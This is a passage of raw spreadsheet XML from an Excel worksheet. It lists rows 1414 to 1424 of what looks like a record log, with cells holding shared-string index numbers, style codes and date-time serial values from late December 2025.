      </c>
      <c r="E1414" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1414" s="23" t="s">
        <v>10829</v>
      </c>
      <c r="G1414" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1414" s="23"/>
      <c r="I1414" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1414" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1414" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1414" s="24">
        <v>45994.6920486111</v>
      </c>
      <c r="M1414" s="24">
        <v>45994.6920486111</v>
      </c>
      <c r="N1414" s="23" t="s">
        <v>8446</v>
      </c>
      <c r="O1414" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1414" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1414" s="23"/>
      <c r="R1414" s="23" t="s">
        <v>1698</v>
      </c>
      <c r="S1414" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1414" s="23"/>
      <c r="U1414" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1414" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1414" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1414" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1414" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1414" s="24">
        <v>45994.6929166667</v>
      </c>
      <c r="AA1414" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1414" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1414" s="23"/>
      <c r="AD1414" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1414" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1414" s="23"/>
      <c r="AG1414" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1414" s="24">
        <v>45994.6929513889</v>
      </c>
      <c r="AI1414" s="23"/>
      <c r="AJ1414" s="23"/>
      <c r="AK1414" s="23"/>
      <c r="AL1414" s="23"/>
      <c r="AM1414" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1414" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1414" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1414" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1414" s="24">
        <v>45994.71375</v>
      </c>
      <c r="AR1414" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1414" s="23"/>
      <c r="AT1414" s="23"/>
      <c r="AU1414" s="23"/>
    </row>
    <row r="1415" s="1" customFormat="1" spans="1:47">
      <c r="A1415" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1415" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1415" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1415" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1415" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1415" s="23" t="s">
        <v>10830</v>
      </c>
      <c r="G1415" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1415" s="23"/>
      <c r="I1415" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1415" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1415" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1415" s="24">
        <v>45994.682962963</v>
      </c>
      <c r="M1415" s="24">
        <v>45994.682962963</v>
      </c>
      <c r="N1415" s="23" t="s">
        <v>8446</v>
      </c>
      <c r="O1415" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1415" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1415" s="23"/>
      <c r="R1415" s="23" t="s">
        <v>10831</v>
      </c>
      <c r="S1415" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1415" s="23"/>
      <c r="U1415" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1415" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1415" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1415" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1415" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1415" s="24">
        <v>45994.6837731482</v>
      </c>
      <c r="AA1415" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1415" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1415" s="23"/>
      <c r="AD1415" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1415" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1415" s="23"/>
      <c r="AG1415" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1415" s="24">
        <v>45994.6837962963</v>
      </c>
      <c r="AI1415" s="23"/>
      <c r="AJ1415" s="23"/>
      <c r="AK1415" s="23"/>
      <c r="AL1415" s="23"/>
      <c r="AM1415" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1415" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1415" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1415" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1415" s="24">
        <v>45994.7046064815</v>
      </c>
      <c r="AR1415" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1415" s="23"/>
      <c r="AT1415" s="23"/>
      <c r="AU1415" s="23"/>
    </row>
    <row r="1416" s="1" customFormat="1" spans="1:47">
      <c r="A1416" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1416" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1416" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1416" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1416" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1416" s="23" t="s">
        <v>10832</v>
      </c>
      <c r="G1416" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1416" s="23"/>
      <c r="I1416" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1416" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1416" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1416" s="24">
        <v>45994.6730439815</v>
      </c>
      <c r="M1416" s="24">
        <v>45994.6730439815</v>
      </c>
      <c r="N1416" s="23" t="s">
        <v>10444</v>
      </c>
      <c r="O1416" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1416" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1416" s="23"/>
      <c r="R1416" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1416" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1416" s="23"/>
      <c r="U1416" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1416" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1416" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1416" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1416" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1416" s="24">
        <v>45994.6738888889</v>
      </c>
      <c r="AA1416" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1416" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1416" s="23"/>
      <c r="AD1416" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1416" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1416" s="23"/>
      <c r="AG1416" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH1416" s="24">
        <v>45994.673912037</v>
      </c>
      <c r="AI1416" s="23"/>
      <c r="AJ1416" s="23"/>
      <c r="AK1416" s="23"/>
      <c r="AL1416" s="23"/>
      <c r="AM1416" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1416" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1416" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1416" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1416" s="24">
        <v>45994.6947222222</v>
      </c>
      <c r="AR1416" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1416" s="23"/>
      <c r="AT1416" s="23"/>
      <c r="AU1416" s="23"/>
    </row>
    <row r="1417" s="1" customFormat="1" spans="1:47">
      <c r="A1417" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1417" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1417" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1417" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1417" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1417" s="23" t="s">
        <v>10833</v>
      </c>
      <c r="G1417" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1417" s="23"/>
      <c r="I1417" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1417" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1417" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1417" s="24">
        <v>45994.5930324074</v>
      </c>
      <c r="M1417" s="24">
        <v>45994.5930324074</v>
      </c>
      <c r="N1417" s="23" t="s">
        <v>10444</v>
      </c>
      <c r="O1417" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1417" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1417" s="23"/>
      <c r="R1417" s="23" t="s">
        <v>2484</v>
      </c>
      <c r="S1417" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1417" s="23"/>
      <c r="U1417" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1417" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1417" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1417" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1417" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1417" s="24">
        <v>45994.5939236111</v>
      </c>
      <c r="AA1417" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1417" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1417" s="23"/>
      <c r="AD1417" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1417" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1417" s="23"/>
      <c r="AG1417" s="25" t="s">
        <v>8475</v>
      </c>
      <c r="AH1417" s="24">
        <v>45994.5939699074</v>
      </c>
      <c r="AI1417" s="23"/>
      <c r="AJ1417" s="23"/>
      <c r="AK1417" s="23"/>
      <c r="AL1417" s="23"/>
      <c r="AM1417" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1417" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1417" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1417" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1417" s="24">
        <v>45994.6147569444</v>
      </c>
      <c r="AR1417" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1417" s="23"/>
      <c r="AT1417" s="23"/>
      <c r="AU1417" s="23"/>
    </row>
    <row r="1418" s="1" customFormat="1" spans="1:47">
      <c r="A1418" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1418" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1418" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1418" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1418" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1418" s="23" t="s">
        <v>10834</v>
      </c>
      <c r="G1418" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1418" s="23"/>
      <c r="I1418" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1418" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1418" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1418" s="24">
        <v>45994.5348842593</v>
      </c>
      <c r="M1418" s="24">
        <v>45994.5348842593</v>
      </c>
      <c r="N1418" s="23" t="s">
        <v>8809</v>
      </c>
      <c r="O1418" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1418" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1418" s="23"/>
      <c r="R1418" s="23" t="s">
        <v>8473</v>
      </c>
      <c r="S1418" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1418" s="23"/>
      <c r="U1418" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1418" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1418" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1418" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1418" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1418" s="24">
        <v>45994.5356712963</v>
      </c>
      <c r="AA1418" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1418" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1418" s="23"/>
      <c r="AD1418" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1418" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1418" s="23"/>
      <c r="AG1418" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1418" s="24">
        <v>45994.5356944444</v>
      </c>
      <c r="AI1418" s="23"/>
      <c r="AJ1418" s="23"/>
      <c r="AK1418" s="23"/>
      <c r="AL1418" s="23"/>
      <c r="AM1418" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1418" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1418" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1418" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1418" s="24">
        <v>45994.5565046296</v>
      </c>
      <c r="AR1418" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1418" s="23"/>
      <c r="AT1418" s="23"/>
      <c r="AU1418" s="23"/>
    </row>
    <row r="1419" s="1" customFormat="1" spans="1:47">
      <c r="A1419" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1419" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1419" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1419" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1419" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1419" s="23" t="s">
        <v>10835</v>
      </c>
      <c r="G1419" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1419" s="23"/>
      <c r="I1419" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1419" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1419" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1419" s="24">
        <v>45994.4039467593</v>
      </c>
      <c r="M1419" s="24">
        <v>45994.4039467593</v>
      </c>
      <c r="N1419" s="23" t="s">
        <v>8385</v>
      </c>
      <c r="O1419" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1419" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1419" s="23"/>
      <c r="R1419" s="23" t="s">
        <v>2484</v>
      </c>
      <c r="S1419" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1419" s="23"/>
      <c r="U1419" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1419" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1419" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1419" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1419" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1419" s="24">
        <v>45994.4047222222</v>
      </c>
      <c r="AA1419" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1419" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1419" s="23"/>
      <c r="AD1419" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1419" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1419" s="23"/>
      <c r="AG1419" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1419" s="24">
        <v>45994.4047569444</v>
      </c>
      <c r="AI1419" s="23"/>
      <c r="AJ1419" s="23"/>
      <c r="AK1419" s="23"/>
      <c r="AL1419" s="23"/>
      <c r="AM1419" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1419" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1419" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1419" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1419" s="24">
        <v>45994.4255555556</v>
      </c>
      <c r="AR1419" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1419" s="23"/>
      <c r="AT1419" s="23"/>
      <c r="AU1419" s="23"/>
    </row>
    <row r="1420" s="1" customFormat="1" spans="1:47">
      <c r="A1420" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1420" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1420" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1420" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1420" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1420" s="23" t="s">
        <v>10836</v>
      </c>
      <c r="G1420" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1420" s="23"/>
      <c r="I1420" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1420" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1420" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1420" s="24">
        <v>45994.4032523148</v>
      </c>
      <c r="M1420" s="24">
        <v>45994.4032523148</v>
      </c>
      <c r="N1420" s="23" t="s">
        <v>10444</v>
      </c>
      <c r="O1420" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1420" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1420" s="23"/>
      <c r="R1420" s="23" t="s">
        <v>2484</v>
      </c>
      <c r="S1420" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1420" s="23"/>
      <c r="U1420" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1420" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1420" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1420" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1420" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1420" s="24">
        <v>45994.4034375</v>
      </c>
      <c r="AA1420" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1420" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1420" s="23"/>
      <c r="AD1420" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1420" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1420" s="23"/>
      <c r="AG1420" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1420" s="24">
        <v>45994.4034606482</v>
      </c>
      <c r="AI1420" s="23"/>
      <c r="AJ1420" s="23"/>
      <c r="AK1420" s="23"/>
      <c r="AL1420" s="23"/>
      <c r="AM1420" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1420" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1420" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1420" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1420" s="24">
        <v>45994.4242708333</v>
      </c>
      <c r="AR1420" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1420" s="23"/>
      <c r="AT1420" s="23"/>
      <c r="AU1420" s="23"/>
    </row>
    <row r="1421" s="1" customFormat="1" spans="1:47">
      <c r="A1421" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1421" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1421" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1421" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1421" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1421" s="23" t="s">
        <v>10837</v>
      </c>
      <c r="G1421" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1421" s="23"/>
      <c r="I1421" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1421" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1421" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1421" s="24">
        <v>45994.4019097222</v>
      </c>
      <c r="M1421" s="24">
        <v>45994.4019097222</v>
      </c>
      <c r="N1421" s="23" t="s">
        <v>8536</v>
      </c>
      <c r="O1421" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1421" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1421" s="23"/>
      <c r="R1421" s="23" t="s">
        <v>2484</v>
      </c>
      <c r="S1421" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1421" s="23"/>
      <c r="U1421" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1421" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1421" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1421" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1421" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1421" s="24">
        <v>45994.4027083333</v>
      </c>
      <c r="AA1421" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1421" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1421" s="23"/>
      <c r="AD1421" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1421" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1421" s="23"/>
      <c r="AG1421" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1421" s="24">
        <v>45994.4027430556</v>
      </c>
      <c r="AI1421" s="23"/>
      <c r="AJ1421" s="23"/>
      <c r="AK1421" s="23"/>
      <c r="AL1421" s="23"/>
      <c r="AM1421" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1421" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1421" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1421" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1421" s="24">
        <v>45994.4235416667</v>
      </c>
      <c r="AR1421" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1421" s="23"/>
      <c r="AT1421" s="23"/>
      <c r="AU1421" s="23"/>
    </row>
    <row r="1422" s="1" customFormat="1" spans="1:47">
      <c r="A1422" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1422" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1422" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1422" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1422" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1422" s="23" t="s">
        <v>10838</v>
      </c>
      <c r="G1422" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1422" s="23"/>
      <c r="I1422" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1422" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1422" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1422" s="24">
        <v>45994.3669791667</v>
      </c>
      <c r="M1422" s="24">
        <v>45994.3669791667</v>
      </c>
      <c r="N1422" s="23" t="s">
        <v>8586</v>
      </c>
      <c r="O1422" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1422" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1422" s="23"/>
      <c r="R1422" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1422" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1422" s="23"/>
      <c r="U1422" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1422" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1422" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1422" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1422" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1422" s="24">
        <v>45994.3674074074</v>
      </c>
      <c r="AA1422" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1422" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1422" s="23"/>
      <c r="AD1422" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1422" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1422" s="23"/>
      <c r="AG1422" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH1422" s="24">
        <v>45994.3674305556</v>
      </c>
      <c r="AI1422" s="23"/>
      <c r="AJ1422" s="23"/>
      <c r="AK1422" s="23"/>
      <c r="AL1422" s="23"/>
      <c r="AM1422" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1422" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1422" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1422" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1422" s="24">
        <v>45994.3882407407</v>
      </c>
      <c r="AR1422" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1422" s="23"/>
      <c r="AT1422" s="23"/>
      <c r="AU1422" s="23"/>
    </row>
    <row r="1423" s="1" customFormat="1" spans="1:47">
      <c r="A1423" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1423" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1423" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1423" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1423" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1423" s="23" t="s">
        <v>10839</v>
      </c>
      <c r="G1423" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1423" s="23"/>
      <c r="I1423" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1423" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1423" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1423" s="24">
        <v>45994.3609375</v>
      </c>
      <c r="M1423" s="24">
        <v>45994.3609375</v>
      </c>
      <c r="N1423" s="23" t="s">
        <v>8586</v>
      </c>
      <c r="O1423" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1423" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1423" s="23"/>
      <c r="R1423" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1423" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1423" s="23"/>
      <c r="U1423" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1423" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1423" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1423" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1423" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1423" s="24">
        <v>45994.3613888889</v>
      </c>
      <c r="AA1423" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1423" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1423" s="23"/>
      <c r="AD1423" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1423" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1423" s="23"/>
      <c r="AG1423" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1423" s="24">
        <v>45994.361412037</v>
      </c>
      <c r="AI1423" s="23"/>
      <c r="AJ1423" s="23"/>
      <c r="AK1423" s="23"/>
      <c r="AL1423" s="23"/>
      <c r="AM1423" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1423" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1423" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1423" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1423" s="24">
        <v>45994.3822222222</v>
      </c>
      <c r="AR1423" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1423" s="23"/>
      <c r="AT1423" s="23"/>
      <c r="AU1423" s="23"/>
    </row>
    <row r="1424" s="1" customFormat="1" spans="1:47">
      <c r="A1424" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1424" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1424" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1424" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1424" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1424" s="23" t="s">
        <v>10840</v>
      </c>
      <c r="G1424" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1424" s="23"/>
      <c r="I1424" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1424" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1424" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1424" s="24">
        <v>45994.3601273148</v>
      </c>
      <c r="M1424" s="24">
        <v>45994.3601273148</v>
      </c>
      <c r="N1424" s="23" t="s">
        <v>8586</v>
      </c>
      <c r="O1424" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1424" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1424" s="23"/>
      <c r="R1424" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1424" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1424" s="23"/>
      <c r="U1424" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1424" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1424" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1424" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1424" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1424" s="24">
        <v>45994.3607523148</v>
      </c>
      <c r="AA1424" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1424" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1424" s="23"/>
      <c r="AD1424" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1424" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1424" s="23"/>
      <c r="AG1424" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1424" s="24">
        <v>45994.360787037</v>
      </c>
